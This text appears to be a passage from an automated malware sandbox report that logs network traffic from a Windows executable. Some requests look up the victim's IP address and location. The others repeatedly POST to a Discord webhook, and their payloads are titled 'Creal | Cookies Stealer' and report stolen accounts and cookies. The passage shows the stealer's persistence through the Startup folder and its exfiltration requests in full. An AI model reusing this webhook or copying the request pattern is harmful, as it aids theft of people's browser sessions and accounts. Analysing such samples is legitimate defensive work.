                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453941
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GunBpw3H93FVr7nxI3vW7UWUSuJqVO2CDJFBsYOURr30lgS4j2kSaKca8KnZKv8PUtU2PNeMfdfw4iS4KU1fzdd6HV1jMXtvWxRLm2zmvvs6u5Fy47rHLV8EdIP6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=34574a527cec11efa2060e62cbdde76223474cb28fd6dbbf2103019ed06984a82fe56697383b506ece1febe3e8d3e11f; Expires=Wed, 26-Sep-2029 16:19:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=7affd72039bfc759ddd7d629cf7feaa78cb7e6c9-1727453940; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:00 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 30 4e 30 47 71 65 4c 46 38 49 4d 6b 65 33 5a 6c 4d 56 30 4c 73 50 73 65 62 75 56 55 35 76 4c 4b 67 70 39 6a 73 59 79 30 6b 49 45 2d 31 37 32 37 34 35 33 39 34 30 34 31 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 31 37 32 64 32 61 37 38 65 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=0N0GqeLF8IMke3ZlMV0LsPsebuVU5vLKgp9jsYy0kIE-1727453940416-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0172d2a78e2-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:00 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                27192.168.2.849740162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:00 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:00 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:01 UTC1331INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:01 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=34bf85b87cec11efb41b16ad33b060f2; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453942
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jDmJdrMNV2xiJYzH2lNiDU3R8dCJjfGmlMoVL9FYDsu5amF4pHIxWZJjTtELnaGaMZWwHEA2FMPI2WIHbyAdLscMxY3U4KWklJCHvn4OZhDk2DreENz3p85d%2BJDA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=34bf85b87cec11efb41b16ad33b060f2b95a6d5062626dde94c14e84002967a5fb0b075e1e482e91ac2d49e42de876ee; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=fbe7f0d857c54826245c4e0cf497aa483d23d881-1727453941; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:01 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 64 68 53 39 67 6b 58 35 76 78 52 38 4b 48 59 47 56 77 52 48 59 6e 74 4c 45 32 79 33 50 75 78 46 77 74 58 64 51 71 49 36 78 78 38 2d 31 37 32 37 34 35 33 39 34 31 31 30 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 31 62 34 62 31 63 34 33 39 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=dhS9gkX5vxR8KHYGVwRHYntLE2y3PuxFwtXdQqI6xx8-1727453941100-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd01b4b1c439a-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:01 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                28192.168.2.849741162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:01 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:01 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:01 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:01 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3534f97e7cec11ef93886a726fe7a83e; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453943
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cRk6kaTaqqq5uXKTyOTn7IDbhJ5cFsLSEk01TjECb4HNyXfPUhfoY%2BJVdEAKutQc%2BC07B0Z8NTq6WgGfiEtxF3soYpk6UeT36fjAy%2BkoSAgofzpPYxGek87BJAro"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3534f97e7cec11ef93886a726fe7a83e1c137929250cb519ca8b91474352381d171f4301648df8ec637c694a9b75e94a; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=fbe7f0d857c54826245c4e0cf497aa483d23d881-1727453941; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:01 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 41 57 64 58 4b 48 6f 72 75 6a 4f 59 47 6b 78 45 4c 51 34 35 5f 42 59 4b 78 7a 67 70 30 64 64 6e 4a 65 7a 33 30 72 6e 4c 73 57 30 2d 31 37 32 37 34 35 33 39 34 31 38 36 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 32 30 33 63 36 62 63 33 34 33 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=AWdXKHorujOYGkxELQ45_BYKxzgp0ddnJez30rnLsW0-1727453941869-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0203c6bc343-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:01 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                29192.168.2.849742162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:02 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:02 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:02 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:02 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=35a295427cec11ef91f2bee3f8a49ee5; Expires=Wed, 26-Sep-2029 16:19:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453943
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xRWE2%2FbkJRY5CBVvGAMXY%2FfawRRtG%2B174oxnlApwpmKo6LvcPf95SgqnIYPVEYpGFzc6Z4p6hePoiEefq3q09GrVs4NdN0OEnXqTNxpRfM8orrA0tbuT62MRMYBv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=35a295427cec11ef91f2bee3f8a49ee5d8d0e84959a2381178676574c1aca333daa355925bb8caffbdcc127a490ba9d7; Expires=Wed, 26-Sep-2029 16:19:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=c706bff95cf2f6ea15d8fa6873914924c3ad57a1-1727453942; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:02 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 55 39 2e 6f 44 5a 79 72 74 45 7a 59 62 37 55 38 45 37 75 6b 2e 32 76 73 68 39 73 39 69 50 45 4c 32 70 5f 4d 6b 63 39 48 35 6e 38 2d 31 37 32 37 34 35 33 39 34 32 35 38 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 32 34 36 39 39 31 35 65 37 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=U9.oDZyrtEzYb7U8E7uk.2vsh9s9iPEL2p_Mkc9H5n8-1727453942588-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd02469915e7c-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:02 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                30192.168.2.849743172.67.74.1524435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:02 UTC117OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:02 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:02 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8c9cd026ce761a2c-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:02 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                31192.168.2.849746172.67.74.1524434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:03 UTC117OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:03 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:03 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8c9cd02b6f2442ef-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:03 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                32192.168.2.849745159.89.102.2534435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:03 UTC139OUTGET /jsonp/8.46.123.33 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: geolocation-db.com
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:03 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:03 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:03 UTC171INData Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                33192.168.2.849748162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:04 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
